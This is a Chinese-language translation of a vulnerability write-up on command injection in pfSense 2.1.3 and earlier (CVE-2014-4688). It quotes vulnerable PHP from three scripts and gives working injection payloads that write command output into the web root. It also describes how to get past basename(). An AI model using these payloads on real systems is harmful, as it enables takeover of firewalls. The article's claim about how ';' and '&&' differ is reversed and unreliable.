PfSense命令注入漏洞分析

翻译：mssp299

原文地址： https://www.proteansec.com/linux/pfsense-vulnerabilities-part-2-command-injection/

0x00 导言

在本文中，我们将向大家介绍在 PfSense 的 2.1.3 以及更低版本中的 CVE-2014-4688 漏洞；对于更高的版本来说， pfSense 已经修复了这个漏洞。

0x01 Diag_dns.php脚本中的命令注入漏洞

下面展示的是脚本 diag_dns.php 中存在命令注入漏洞的代码片。我们可以看到，这段代码首先检查 POST 参数 host 是否存在，如果存在的话，就将变量 $GET 的值赋给变量 $POST 。然后，代码继续检查 GET 参数 createalias 的值是否等于 true ，如果是的话，则把POST参数host的值的首尾空白符去掉 ：trim() 函数的作用就是去掉字符串首尾处的空白符，但是字符串中间部分的空白符则保持不变。之后，还有一些其他语句，不过它们并不是我们这里关注的重点，我们关心的是如何插入在反引号中运行的命令。

/* Cheap hack to support both $_GET and $_POST */ if ($_GET['host']) $_POST = $_GET;  if($_GET['createalias'] == "true") { $host = trim($_POST['host']); if($_GET['override']) $override = true; $a_aliases = &$config['aliases']['alias']; $type = "hostname"; $resolved = gethostbyname($host); if($resolved) { $host = trim($_POST['host']); $dig=`dig "$host" A | grep "$host" | grep -v ";" | awk '{ print 5 }'`; 

由于我们可以直接操纵变量 $host 的值，因此，我们完全可以在注入代码的反引号中插入我们想要执行的命令。下面，我们输入以下内容，让它作为 POST 变量 host 的输入值：

192.168.1.1";ifconfig>/usr/local/www/temp.txt;echo+" 

下面展示的是含有上述输入字符串的HTTP请求，具体如图所示。

图1 发送给服务器的恶意请求

当上面所示的请求被执行时， Web 浏览器会显示如下所示的内容，其中含有一个错误信息，出错原因是没有提供有效的主机名。

图2 错误消息： invalid hostname

我们已经在用户提供的 POST 参数 host 放入了一个特殊字符;，这个字符的作用是分隔多个顺序执行的命令。需要注意的是这种情况下，只有当第一条命令返回``（成功返回）的时候，第二条命令才会被执行；因此，只有确保前面的命令全部成功，后面的命令才能得以执行。下面给出一些可以放在反引号中执行的命令：

# dig "192.168.1.1"; # ifconfig>/usr/local/www/temp.txt; # echo+"" A | grep "192.168.1.1"; # ifconfig>/usr/local/www/temp.txt; # echo+"" | grep -v ";" | awk '{ print $5 }' 

我们会看到，每条命令都会正确执行，其中最重要的命令就是 ifconfig 了，它已经被注入到了获得输出内容的脚本中了。由于我们无法直接通过响应报文获得这些命令的输出结果，所以必须通过管道命令将其输出到 DocumentRoot 下的一个文件中，然后才能通过 Web 浏览器正常访问。下面展示的是 https://pfsense/temp.txt 中的部分请求内容。

图3 生成的 temp.txt 文件

前面，我们已经成功地注入了 ifconfig 命令并得到了其输出结果，实际上这就意味着我们可以向 diag_dns.php 脚本输入任意命令并能得到其输出结果。

因此，攻击者可以注入精心构造的命令，并使其在服务器上面执行。

0x02 Diag_smart.php脚本中的命令注入

在 diag_smart.php 脚本中，含有一个名为 update_email 的函数，代码如下所示。这个函数的作用是编辑 smartd.conf 文件，来添加或删除通知磁盘出错情况的电子邮件地址。从下面的代码可以看到，这个函数带有一个名为 smartmonemail 的 POST 参数。需要注意的是，这个函数会调用 sed 命令，并将参数 unescaped 直接传递给 shell_exec 函数。

 function update_email($email)   {   // Did they pass an email?   if(!empty($email))   {   // Put it in the smartd.conf file   shell_exec("/usr/bin/sed -i old 's/^DEVICESCAN.*/DEVICESCAN -H -m "  $email . "/' /usr/local/etc/smartd.conf");   }   // Nope   Else   {   // Remove email flags in smartd.conf   shell_exec("/usr/bin/sed -i old 's/^DEVICESCAN.*/DEVICESCAN/' usr/local/etc/smartd.conf");   }   }   if($_POST['email'])   {   // Write the changes to the smartd.conf file   update_email($_POST['smartmonemail']);   } 

实际上，上面的代码存在一个漏洞，允许我们向 shell_exec 函数注入任意命令，并执行之。下面的请求为我们展示了一个命令注入示例，它将" Command Injection "反射到 /var/local/www/cmd.txt 文件中。

当 shell_exec 函数执行时，实际上下列命令也会随之执行。

# /usr/bin/sed -i old 's/^DEVICESCAN.*/DEVICESCAN -H -m ejan/'+/usr/local/etc/lynx.cfg; # echo+"Command+Injection">/usr/local/www/cmd.txt; # echo+' /' /usr/local/etc/smartd.conf; 

在上面的命令中，第一条和第三条命令只是配角，中间那条命令才是我们想要注入的主角。实际上，我们可以利用 shell_exec 函数注入任意命令。如果使用浏览器访问 https://pfsense/cmd.txt 就会发现，这个字符串实际上已经被保存到 DocumentRoot 下的相应文件中了。

图4 生成的 cmd.txt 文件

换句话说，攻击者可以注入任意命令，并使其在服务器上面执行。

0x03 Status_rrd_graph_img.php脚本中的命令注入漏洞

在 status_rrd_graph_img.php 脚本中也存在命令注入漏洞，这主要是由于 exec() 函数的调用方式引起的，下面是与此漏洞有关的部分代码。

if ($_GET['database']) {   $curdatabase = basename($_GET['database']);   } else {   $curdatabase = "wan-traffic.rrd";   }    if(strstr($curdatabase, "queues")) {   log_error(sprintf(gettext("failed to create graph from %s%s, emoving database"),$rrddbpath,$curdatabase));   exec("/bin/rm -f $rrddbpath$curif$queues");   Flush();   Usleep(500);   enable_rrd_graphing();   }   if(strstr($curdatabase, "queuesdrop")) {   log_error(sprintf(gettext("failed to create graph from %s%s, emoving database"),$rrddbpath,$curdatabase));   exec("/bin/rm -f $rrddbpath$curdatabase");   Flush();   Usleep(500);   enable_rrd_graphing();   } 

在上述代码的开头部分，会根据 GET 参数 database 的设置情况来调用 basename 函数：如果设置了该参数，则利用它来调用 basename 函数；否则就被设为静态字符串 wan-traffic.rrd 。由于我们想要将代码注入到这个脚本中，所以，我们必须将这个参数设为某个值，因为我们必须这样做才能绕过 basename 函数。此外， basename 函数需要一个文件路径作为其参数，其返回值为路径中的文件名部分（不包括扩展名），需要说明的是在 Linux /BSD（pfSense） 中使用正斜杠/来作为路径分隔符。因此，这个函数返回的内容基本上就是最后一个正斜杠/后面的字符串，这一点在注入参数值时必须考虑到，因为最后一个正斜杠前面的内容都会被删去。 因此，我们可以向 GET 参数 database 中注入任意字符，但是正斜杠除外。需要注意的是，我们可以向上面代码中的任何一个 exec() 语句注入命令，这主要取决于利用 GET 参数 databage 传递的字符串——就本例来说，我们使用的是第二个 exec() 函数调用，因为它要更简单一些。 当上面的底部代码被执行的时候，下列命令也会随之执行。

# /bin/rm -f /var/db/rrd/$curdatabase; 

我们可以在这个命令的尾部添加字符;，以便插入其他在 rm 命令运行结束以后需要执行的命令。需要说明的是，如果我们使用了命令分隔符;的话，那么只有当 rm 命令已经成功执行完成之后，后插入的命令才会被执行。如果我们并不关心 rm 命令的执行结果的话，我们可以使用 && 来分隔命令。需要说明的是，我们无法向任意目录中 echo 文本，因为这里不允许使用正斜杠。为了克服这个问题，我们可以先通过 cd 命令进入预定目录，然后通过命令管道实现文本传输的目的。首先，我们必须搞清楚被执行代码的当前目录，这里为 /var/db/rrd/directory 。下面的请求展示了我们是如何执行 queues;echo+"CMD+INJECT">cmd.txt 命令的。

图5 执行 echo 命令的请求

由于当前目录是 /var/db/rrd/ ，因此，这里创建的 cmd.txt 文件的内容为 CMD INJECT ，这可以通过显示该文件的内容来加以检验。

# cat /var/db/rrd/cmd.txt CMD INJECT 

为了在 PfSense 安装路径下的 DocumentRoot 中生成同样的文件，我们可以通过三个 cd .. 命令返回上层目录，然后切换至 /usr/local/www/ directory 目录，并从这里执行 echo 命令。这样就能够在 /usr/local/www/cmd.txt 路径生成 cmd.txt 文件了。

图6 执行 echo 命令的请求

由于我们当前位于 PfSense Web 应用的 DocumentRoot 目录中，所以只要在浏览器中请求 cmd.txt ，就能知道是否收到了输出 CMD INJECT 了。

图7 生成的 cmd.txt 文件

这个漏洞允许我们在 PfSense 服务器上执行任意的代码，因此最终会导致这个防火墙形同虚设。 换句话说，攻击者可以注入任意命令，并使其在服务器上面执行。

0x04 小结

本文详细分析了我们在PfSense中发现的一些命令注入漏洞，希望对读者朋友们有所帮助。